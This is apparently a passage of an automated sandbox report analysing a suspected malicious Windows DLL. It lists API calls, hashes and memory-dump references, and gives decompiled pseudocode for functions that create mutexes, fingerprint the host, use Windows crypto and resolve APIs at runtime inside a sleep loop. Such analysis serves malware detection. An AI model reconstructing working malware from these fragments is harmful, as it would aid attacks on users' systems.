                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 67701924
                                                                                                                                                    • Part of subcall function 67707984: _errno.LIBCMT ref: 6770799C
                                                                                                                                                    • Part of subcall function 67707984: _invalid_parameter_noinfo.LIBCMT ref: 677079A8
                                                                                                                                                    • Part of subcall function 677070DC: _errno.LIBCMT ref: 677070FA
                                                                                                                                                    • Part of subcall function 677070DC: _invalid_parameter_noinfo.LIBCMT ref: 67707106
                                                                                                                                                  • free.LIBCMT ref: 67701939
                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 67701963
                                                                                                                                                  • free.LIBCMT ref: 67701978
                                                                                                                                                    • Part of subcall function 677044F8: malloc.LIBCMT ref: 67704537
                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 677019A2
                                                                                                                                                  • free.LIBCMT ref: 677019B7
                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 677019E1
                                                                                                                                                  • free.LIBCMT ref: 677019F6
                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 67701A20
                                                                                                                                                  • free.LIBCMT ref: 67701A35
                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 67701A5F
                                                                                                                                                  • free.LIBCMT ref: 67701A74
                                                                                                                                                    • Part of subcall function 67707984: _errno.LIBCMT ref: 677079D5
                                                                                                                                                    • Part of subcall function 677070DC: _errno.LIBCMT ref: 67707148
                                                                                                                                                  • free.LIBCMT ref: 67701B28
                                                                                                                                                  • LoadLibraryA.KERNELBASE ref: 67701B32
                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 67701B80
                                                                                                                                                  • free.LIBCMT ref: 67701B8D
                                                                                                                                                  • free.LIBCMT ref: 67701BE7
                                                                                                                                                  • LoadLibraryA.KERNEL32 ref: 67701BF1
                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 67701C3B
                                                                                                                                                  • free.LIBCMT ref: 67701C48
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$AddressProc$_errno$LibraryLoad$_invalid_parameter_noinfo$DirectoryErrorFreeHeapLastSystemmalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 697119681-0
                                                                                                                                                  • Opcode ID: 267f8eee72607a2292412e4ec4e7acd1fb655d92180eb44f58c629ff1e8fca22
                                                                                                                                                  • Instruction ID: d940775d9bd25dff9ee2114b9c941b41f3b8bbd4afade917d8cf3d522dabd031
                                                                                                                                                  • Opcode Fuzzy Hash: 267f8eee72607a2292412e4ec4e7acd1fb655d92180eb44f58c629ff1e8fca22
                                                                                                                                                  • Instruction Fuzzy Hash: 89D13DA1219B8195CE14DB62AA5836EA3D2F79EBCCF840025DF8E9B718EF3DC1558341
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677011E0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 106windowsynchronizationthreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNELBASE ref: 67701222
                                                                                                                                                    • Part of subcall function 6770163C: malloc.LIBCMT ref: 67701690
                                                                                                                                                    • Part of subcall function 6770163C: CryptAcquireContextW.ADVAPI32 ref: 677016C3
                                                                                                                                                    • Part of subcall function 6770379C: GetComputerNameW.KERNEL32 ref: 677037D2
                                                                                                                                                    • Part of subcall function 6770379C: GetVolumeInformationW.KERNELBASE ref: 677037F7
                                                                                                                                                    • Part of subcall function 6770379C: wsprintfA.USER32 ref: 6770380E
                                                                                                                                                    • Part of subcall function 6770379C: calloc.LIBCMT ref: 67703868
                                                                                                                                                    • Part of subcall function 6770379C: lstrcpyW.KERNEL32 ref: 67703888
                                                                                                                                                    • Part of subcall function 6770379C: lstrcatW.KERNEL32 ref: 67703898
                                                                                                                                                    • Part of subcall function 6770379C: free.LIBCMT ref: 677038B5
                                                                                                                                                  • OpenMutexW.KERNEL32 ref: 67701252
                                                                                                                                                  • GetLastError.KERNEL32 ref: 6770125B
                                                                                                                                                  • CloseHandle.KERNEL32 ref: 6770126E
                                                                                                                                                  • CreateMutexW.KERNELBASE ref: 6770127D
                                                                                                                                                  • free.LIBCMT ref: 67701288
                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 677012AA
                                                                                                                                                  • malloc.LIBCMT ref: 677012BE
                                                                                                                                                  • GetModuleHandleW.KERNELBASE ref: 677012DC
                                                                                                                                                  • free.LIBCMT ref: 677012E8
                                                                                                                                                  • CreateWindowExW.USER32 ref: 6770132B
                                                                                                                                                  • CreateThread.KERNELBASE ref: 6770134E
                                                                                                                                                  • TranslateMessage.USER32 ref: 6770135B
                                                                                                                                                  • DispatchMessageW.USER32 ref: 67701366
                                                                                                                                                  • GetMessageW.USER32 ref: 67701379
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateMessagefree$ErrorHandleModuleMutexNamemalloc$AcquireCloseComputerContextCryptDispatchFileInformationLastModeOpenThreadTranslateVolumeWindowcalloclstrcatlstrcpywsprintf
                                                                                                                                                  • String ID: BUTTON
                                                                                                                                                  • API String ID: 3288680309-3405671355
                                                                                                                                                  • Opcode ID: 2c5dd7c239a6f5fe091622f5cad7dd8bdf21c1f2571b2c7ca244d6f839dfcf80
                                                                                                                                                  • Instruction ID: 50dfebaff087a8d7f3302519e20e21c4f0667c97fd9a16c052e6fef979b2125a
                                                                                                                                                  • Opcode Fuzzy Hash: 2c5dd7c239a6f5fe091622f5cad7dd8bdf21c1f2571b2c7ca244d6f839dfcf80
                                                                                                                                                  • Instruction Fuzzy Hash: E841A1B171CB8186EB10CF61E59875EB7A2F798BDCF844125DA4E87A18DF39C155CB00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67703A1C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85encryptionstringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CryptCreateHash.ADVAPI32 ref: 67703A62
                                                                                                                                                  • CryptHashData.ADVAPI32 ref: 67703A76
                                                                                                                                                  • CryptGetHashParam.ADVAPI32 ref: 67703A99
                                                                                                                                                    • Part of subcall function 67701000: malloc.LIBCMT ref: 67701053
                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 67703AB5
                                                                                                                                                  • free.LIBCMT ref: 67703AC3
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • malloc.LIBCMT ref: 67703ACB
                                                                                                                                                  • malloc.LIBCMT ref: 67703ADB
                                                                                                                                                  • CryptDestroyHash.ADVAPI32 ref: 67703B2C
                                                                                                                                                  Strings
                                                                                                                                                  • 87162e58814e8f99131c3cd67c7160ea, xrefs: 67703A9F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CryptHash$malloc$CreateDataDestroyErrorFreeHeapLastParam_errnofreelstrcpy
                                                                                                                                                  • String ID: 87162e58814e8f99131c3cd67c7160ea
                                                                                                                                                  • API String ID: 3715694442-847851163
                                                                                                                                                  • Opcode ID: 3f675490b0a7c0c6a963d91b2da0d4ba7f9710a8e681b58e32ef11761c75f58f
                                                                                                                                                  • Instruction ID: 5687641682c9367e0da007be0357dc4529a5d8b16d0baa675cdb5e27a4faff3e
                                                                                                                                                  • Opcode Fuzzy Hash: 3f675490b0a7c0c6a963d91b2da0d4ba7f9710a8e681b58e32ef11761c75f58f
                                                                                                                                                  • Instruction Fuzzy Hash: A4315A36718A808AEB00CF61E554B9D37A6F799B8CF990126DF4D5BB08DF38D15AC780
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67704578, Relevance: 9.1, APIs: 6, Instructions: 74encryptionCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Crypt$DestroyEncryptImportfreemalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3380300719-0
                                                                                                                                                  • Opcode ID: c25aa99f4922b8670563cd0bfa965ef9322c72175dc8fa3c21819a751b6c332d
                                                                                                                                                  • Instruction ID: 7a0ea89557eb29cfdb6e788ece5e4441a3f316bda8086daa81b827720bc1c01a
                                                                                                                                                  • Opcode Fuzzy Hash: c25aa99f4922b8670563cd0bfa965ef9322c72175dc8fa3c21819a751b6c332d
                                                                                                                                                  • Instruction Fuzzy Hash: 403168B2B14A5089E7109F62E954B9E7BB4B78CB8CF448525EE8D57B08EF38C595CB00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770163C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46encryptionCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                  			E6770163C(void* __edi, void* __esp, long long __rax, long long __rbx, char* __rcx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
				void* _v0;
				void* _v8;
				void* _v16;
				intOrPtr _v36;
				void* _t23;
				void* _t28;
				signed int _t32;
				void* _t36;
				void* _t37;
				void* _t40;
				long long _t44;
				void* _t61;
				int _t63;

				_t44 = __rax;
				if(__rcx == 0) {
					return _t23;
				}
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				r12d = 0;
				 *((short*)(__rcx + 1)) = 1;
				 *((intOrPtr*)(__rcx + 4)) = r12w;
				 *((intOrPtr*)(__rcx)) = r12b;
				 *(__rcx + 0x418) = _t63;
				 *((intOrPtr*)(__rcx + 0x414)) = r12d;
				memset(__edi, 0, 0x400 << 0);
				_t36 = __edi + 0x400;
				 *(__rcx + 0x10) =  *(__rcx + 0x10) | 0xffffffff;
				malloc(_t63);
				_t13 = _t63 + 1; // 0x1
				r9d = _t13;
				_t14 = _t44 + 0x50; // 0x50
				_t32 = _t14;
				_v36 = 0xf0000040;
				_t28 = memset(_t36, 0, _t32 << 0);
				_t40 = __esp + 0x18;
				_t37 = _t36 + _t32;
				 *((long long*)(__rcx + 8)) = __rax;
				__imp__CryptAcquireContextW(); // executed
				if(_t28 != 0) {
					_t28 = E677016F8(_t37, _t40, __rbx, __rcx + 0x420, __rcx, _t61); // executed
					if(_t28 != 0) {
						 *__rcx = 1;
					}
				}
				return _t28;
			}
















                                                                                                                                                  0x6770163c
                                                                                                                                                  0x6770163f
                                                                                                                                                  0x677016f5
                                                                                                                                                  0x677016f5
                                                                                                                                                  0x67701645
                                                                                                                                                  0x6770164a
                                                                                                                                                  0x6770164f
                                                                                                                                                  0x6770165d
                                                                                                                                                  0x67701664
                                                                                                                                                  0x6770166a
                                                                                                                                                  0x6770166f
                                                                                                                                                  0x67701672
                                                                                                                                                  0x67701679
                                                                                                                                                  0x67701687
                                                                                                                                                  0x67701687
                                                                                                                                                  0x67701689
                                                                                                                                                  0x67701690
                                                                                                                                                  0x67701695
                                                                                                                                                  0x67701695
                                                                                                                                                  0x677016a9
                                                                                                                                                  0x677016a9
                                                                                                                                                  0x677016ae
                                                                                                                                                  0x677016b6
                                                                                                                                                  0x677016b6
                                                                                                                                                  0x677016b6
                                                                                                                                                  0x677016bf
                                                                                                                                                  0x677016c3
                                                                                                                                                  0x677016cb
                                                                                                                                                  0x677016d4
                                                                                                                                                  0x677016db
                                                                                                                                                  0x677016dd
                                                                                                                                                  0x677016dd
                                                                                                                                                  0x677016db
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • malloc.LIBCMT ref: 67701690
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                  • CryptAcquireContextW.ADVAPI32 ref: 677016C3
                                                                                                                                                    • Part of subcall function 677016F8: free.LIBCMT ref: 6770178A
                                                                                                                                                    • Part of subcall function 677016F8: free.LIBCMT ref: 677017DA
                                                                                                                                                    • Part of subcall function 677016F8: LoadLibraryA.KERNELBASE ref: 677017E4
                                                                                                                                                    • Part of subcall function 677016F8: GetProcAddress.KERNEL32 ref: 67701828
                                                                                                                                                    • Part of subcall function 677016F8: free.LIBCMT ref: 6770183D
                                                                                                                                                    • Part of subcall function 677016F8: GetProcAddress.KERNEL32 ref: 67701867
                                                                                                                                                    • Part of subcall function 677016F8: free.LIBCMT ref: 6770187C
                                                                                                                                                  Strings
                                                                                                                                                  • @, xrefs: 677016AE
                                                                                                                                                  • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 6770169A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$AddressProc_errno$AcquireAllocateContextCryptHeapLibraryLoad_callnewhmalloc
                                                                                                                                                  • String ID: @$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                  • API String ID: 3245955250-3585394877
                                                                                                                                                  • Opcode ID: 9a853eb7ed0e33930f8030e2964314ebe6b818f65226a4b42053b611cae177be
                                                                                                                                                  • Instruction ID: 333830620d7a5255886e15d5e3ec745db7ae5d42839a11b8aefc71fc8bfdd9d1
                                                                                                                                                  • Opcode Fuzzy Hash: 9a853eb7ed0e33930f8030e2964314ebe6b818f65226a4b42053b611cae177be
                                                                                                                                                  • Instruction Fuzzy Hash: E21102722057C082D710CF24E90429EBBE5F748B8CF988528CB9957764EF7AC253C744
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677085A4, Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$CreateInformationVersion
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3563531100-0
                                                                                                                                                  • Opcode ID: 2f36ed8a8938b824f3881cd7af9fb86e9ed3781278bf77a4e91366d9506c45e6
                                                                                                                                                  • Instruction ID: ab88830bc260fac932c9130228cf8c747722d86c6c19bac04d188eb4bace94db
                                                                                                                                                  • Opcode Fuzzy Hash: 2f36ed8a8938b824f3881cd7af9fb86e9ed3781278bf77a4e91366d9506c45e6
                                                                                                                                                  • Instruction Fuzzy Hash: 5EE0D87471EA80C2F7445728E8457652266F798748FC81014D90E42B55DF3DC0558744
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677013A8, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 159stringsleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                                  			E677013A8() {
				signed long long _v24;
				void* _v152;
				char _v164;
				void* _t28;
				signed long long _t32;
				void* _t40;
				void* _t61;
				int _t62;
				signed int _t65;
				signed int _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t79;
				signed long long _t80;
				signed long long _t81;
				signed long long _t131;
				signed long long _t132;
				void* _t133;
				void* _t134;
				void* _t138;
				long long _t139;
				signed long long _t140;
				signed long long _t141;
				void* _t142;
				signed long long _t143;

				_t79 = _t134;
				 *(_t79 + 8) = _t82;
				 *(_t79 + 0x10) = _t132;
				 *(_t79 + 0x18) = _t128;
				 *((long long*)(_t79 + 0x20)) = _t139;
				_t80 =  *0x67716000; // 0x9b7b11e8241
				_t81 = _t80 ^ _t134 - 0x000000b0;
				_v24 = _t81;
				_t62 = 0; // executed
				__imp__CoInitialize(_t142); // executed
				while(1) {
					_t77 =  *0x67718431 - 1;
					if( *0x67718431 != 1) {
						goto L5;
					}
					L2:
					_t40 = E67706C40(_t61, _t62, 0x10, _t71, _t73, _t74, _t77, _t82, 0x67718430, _t117, _t128, _t132, _t133, _t136, _t138); // executed
					if(_t40 == 0) {
						_t62 = 0x2b0c77; // executed
						L4:
						SleepEx(); // executed
						 *0x67718431 = 1;
						while(1) {
							_t77 =  *0x67718431 - 1;
							if( *0x67718431 != 1) {
								goto L5;
							}
							goto L2;
						}
					}
					L5:
					E67703C7C(_t71, _t74, _t82, _t128, _t132);
					_t70 =  *0x67718844; // 0x0
					E67703938(_t70, _t74, _t81, _t82, 0x67718444, _t132, _t136);
					_t82 = _t81;
					_t28 = E67703938(0x10, _t74, _t81, _t81, 0x67713018, _t132, _t136);
					_t117 = _t81;
					_t128 = _t81;
					E67704688(_t28, _t62, 0x10, _t81, _t82, _t81, _t138);
					_t132 = _t81;
					E677039E8(_t71, _t74, _t81, _t82, _t81, _t81);
					E677039E8(_t71, _t74, _t81, _t82, _t82, _t81);
					__eflags = _t132;
					if(__eflags != 0) {
						_t32 = E67704A00(_t71, _t74, _t82,  *((intOrPtr*)(_t132 + 8)), _t128, _t132, _t136);
						__eflags = _t32;
						if(_t32 != 0) {
							E67705210(0, _t74, _t81, _t82, _t132, _t133);
							_t129 = _t81;
							E6770334C(0, _t71, _t74, _t82, _t81, _t132, _t136);
							_t137 = _t81;
							_t83 = _t81;
							E67705440(0x10, _t74, _t81,  *((intOrPtr*)(_t132 + 8)), _t81, _t81);
							_t140 = _t81;
							free(??);
							free(??);
							__eflags = _t140;
							if(_t140 != 0) {
								E677039E8(_t71, _t74, _t81, _t83, _t140, _t129);
							}
							E6770334C(0, _t71, _t74, _t83, _t129, _t132, _t137);
							_t82 = _t81;
							E67705210(2, _t74, _t81, _t82, _t132, _t133);
							_t136 = _t82;
							_t128 = _t81;
							E67705440(0x10, _t74, _t82,  *((intOrPtr*)(_t132 + 8)), _t81, _t82);
							_t143 = _t81;
							free(??);
							free(??);
							__eflags = _t143;
							if(_t143 != 0) {
								_t12 = _t81 + 0x73; // 0x73
								_t65 = _t12;
								memset(_t71, 0, _t65 << 0);
								_t75 = _t74 + 0xc;
								_t72 = _t71 + _t65;
								lstrcpyA(??, ??);
								E67701000(_t82, "c05263", "<", _t136);
								_t131 = _t81;
								lstrcatA(??, ??);
								lstrcatA(??, ??);
								E67701000(_t82, "ca575f", " ", _t136);
								_t82 = _t81;
								lstrcatA(??, ??);
								lstrcatA(??, ??);
								__eflags = _t82;
								if(_t82 != 0) {
									free();
								}
								__eflags = _t131;
								if(_t131 != 0) {
									free();
								}
								E67703208(_t81, _t82, _t143,  &_v164, _t132, _t133);
								_t141 = _t81;
								E677039E8(_t72, _t75, _t81, _t82, _t143, _t131);
								_t128 =  &_v164;
								_t21 = _t81 + 0x73; // 0x73
								_t67 = _t21;
								memset(_t72, 0, _t67 << 0);
								_t74 = _t75 + 0xc;
								_t71 = _t72 + _t67;
								__eflags = _t141;
								if(_t141 != 0) {
									_t126 =  *((intOrPtr*)(_t132 + 8));
									E67702804(0, _t71, _t74, _t82, _t141,  *((intOrPtr*)(_t132 + 8)), _t136);
									_t82 = _t81;
									free(??);
									__eflags = _t82;
									if(_t82 != 0) {
										E67701D70(0, 0x10, _t74, _t82, _t82, _t126, _t132, _t133, _t136, _t138);
										_t128 = _t81;
										E677039E8(_t71, _t74, _t81, _t82, _t82, _t128);
										__eflags = _t128;
										if(_t128 != 0) {
											E67701C90(_t71, _t74, _t82, _t128,  *((intOrPtr*)(_t132 + 8)), _t133, _t138);
											free(??);
										}
									}
								}
							}
							E677039E8(_t71, _t74, _t81, _t82, _t132, _t128);
							_t117 =  *0x67718438; // 0x1dea9f10c20
							_t62 =  *((intOrPtr*)(_t117 + 0x48));
							goto L21;
						} else {
							E677039E8(_t71, _t74, _t81, _t82, _t132, _t128);
							_t117 =  *0x67718438; // 0x1dea9f10c20
							_t62 =  *((intOrPtr*)(_t117 + 0x48));
							goto L4;
						}
					} else {
						_t81 =  *0x67718438; // 0x1dea9f10c20
						 *0x67718431 = 1;
						_t62 =  *((intOrPtr*)(_t81 + 0x48));
						L21:
						Sleep();
						continue;
					}
				}
			}
































                                                                                                                                                  0x677013a8
                                                                                                                                                  0x677013ab
                                                                                                                                                  0x677013af
                                                                                                                                                  0x677013b3
                                                                                                                                                  0x677013b7
                                                                                                                                                  0x677013c4
                                                                                                                                                  0x677013cb
                                                                                                                                                  0x677013ce
                                                                                                                                                  0x677013d6
                                                                                                                                                  0x677013d8
                                                                                                                                                  0x677013de
                                                                                                                                                  0x677013de
                                                                                                                                                  0x677013e5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677013e7
                                                                                                                                                  0x677013ee
                                                                                                                                                  0x677013f5
                                                                                                                                                  0x677013f7
                                                                                                                                                  0x677013fc
                                                                                                                                                  0x677013fc
                                                                                                                                                  0x67701402
                                                                                                                                                  0x677013de
                                                                                                                                                  0x677013de
                                                                                                                                                  0x677013e5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677013e5
                                                                                                                                                  0x677013de
                                                                                                                                                  0x6770140b
                                                                                                                                                  0x6770140b
                                                                                                                                                  0x67701410
                                                                                                                                                  0x6770141d
                                                                                                                                                  0x6770142e
                                                                                                                                                  0x67701431
                                                                                                                                                  0x67701439
                                                                                                                                                  0x6770143c
                                                                                                                                                  0x6770143f
                                                                                                                                                  0x67701447
                                                                                                                                                  0x6770144a
                                                                                                                                                  0x67701452
                                                                                                                                                  0x67701457
                                                                                                                                                  0x6770145a
                                                                                                                                                  0x67701476
                                                                                                                                                  0x6770147b
                                                                                                                                                  0x6770147d
                                                                                                                                                  0x67701498
                                                                                                                                                  0x6770149d
                                                                                                                                                  0x677014a0
                                                                                                                                                  0x677014a9
                                                                                                                                                  0x677014af
                                                                                                                                                  0x677014b2
                                                                                                                                                  0x677014ba
                                                                                                                                                  0x677014bd
                                                                                                                                                  0x677014c5
                                                                                                                                                  0x677014ca
                                                                                                                                                  0x677014cd
                                                                                                                                                  0x677014d2
                                                                                                                                                  0x677014d2
                                                                                                                                                  0x677014d7
                                                                                                                                                  0x677014e1
                                                                                                                                                  0x677014e4
                                                                                                                                                  0x677014f0
                                                                                                                                                  0x677014f3
                                                                                                                                                  0x677014f6
                                                                                                                                                  0x677014fe
                                                                                                                                                  0x67701501
                                                                                                                                                  0x67701509
                                                                                                                                                  0x6770150e
                                                                                                                                                  0x67701511
                                                                                                                                                  0x67701525
                                                                                                                                                  0x67701525
                                                                                                                                                  0x67701528
                                                                                                                                                  0x67701528
                                                                                                                                                  0x67701528
                                                                                                                                                  0x6770152f
                                                                                                                                                  0x6770153c
                                                                                                                                                  0x67701549
                                                                                                                                                  0x6770154c
                                                                                                                                                  0x6770155e
                                                                                                                                                  0x6770156b
                                                                                                                                                  0x67701578
                                                                                                                                                  0x6770157b
                                                                                                                                                  0x6770158d
                                                                                                                                                  0x67701593
                                                                                                                                                  0x67701596
                                                                                                                                                  0x6770159b
                                                                                                                                                  0x6770159b
                                                                                                                                                  0x677015a0
                                                                                                                                                  0x677015a3
                                                                                                                                                  0x677015a8
                                                                                                                                                  0x677015a8
                                                                                                                                                  0x677015b5
                                                                                                                                                  0x677015bd
                                                                                                                                                  0x677015c0
                                                                                                                                                  0x677015c7
                                                                                                                                                  0x677015cc
                                                                                                                                                  0x677015cc
                                                                                                                                                  0x677015cf
                                                                                                                                                  0x677015cf
                                                                                                                                                  0x677015cf
                                                                                                                                                  0x677015d1
                                                                                                                                                  0x677015d4
                                                                                                                                                  0x677015d6
                                                                                                                                                  0x677015dd
                                                                                                                                                  0x677015e5
                                                                                                                                                  0x677015e8
                                                                                                                                                  0x677015ed
                                                                                                                                                  0x677015f0
                                                                                                                                                  0x677015f5
                                                                                                                                                  0x677015fd
                                                                                                                                                  0x67701600
                                                                                                                                                  0x67701605
                                                                                                                                                  0x67701608
                                                                                                                                                  0x67701611
                                                                                                                                                  0x67701619
                                                                                                                                                  0x67701619
                                                                                                                                                  0x67701608
                                                                                                                                                  0x677015f0
                                                                                                                                                  0x677015d4
                                                                                                                                                  0x67701621
                                                                                                                                                  0x67701626
                                                                                                                                                  0x6770162d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770147f
                                                                                                                                                  0x67701482
                                                                                                                                                  0x67701487
                                                                                                                                                  0x6770148e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770148e
                                                                                                                                                  0x6770145c
                                                                                                                                                  0x6770145c
                                                                                                                                                  0x67701463
                                                                                                                                                  0x6770146a
                                                                                                                                                  0x67701630
                                                                                                                                                  0x67701630
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701630
                                                                                                                                                  0x6770145a

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$lstrcat$Sleep$ErrorFreeHeapInitializeLast_errnolstrcpy
                                                                                                                                                  • String ID: c05263$ca575f
                                                                                                                                                  • API String ID: 1568106220-986144080
                                                                                                                                                  • Opcode ID: bcd5c54cbc9c2376efc0c95084c035a21d35561b7397a75f0d0e13e5b2110046
                                                                                                                                                  • Instruction ID: 736e884002dbfb2816462a3a51072920b03ce21e48d8e0ece426deaa35ad6cd8
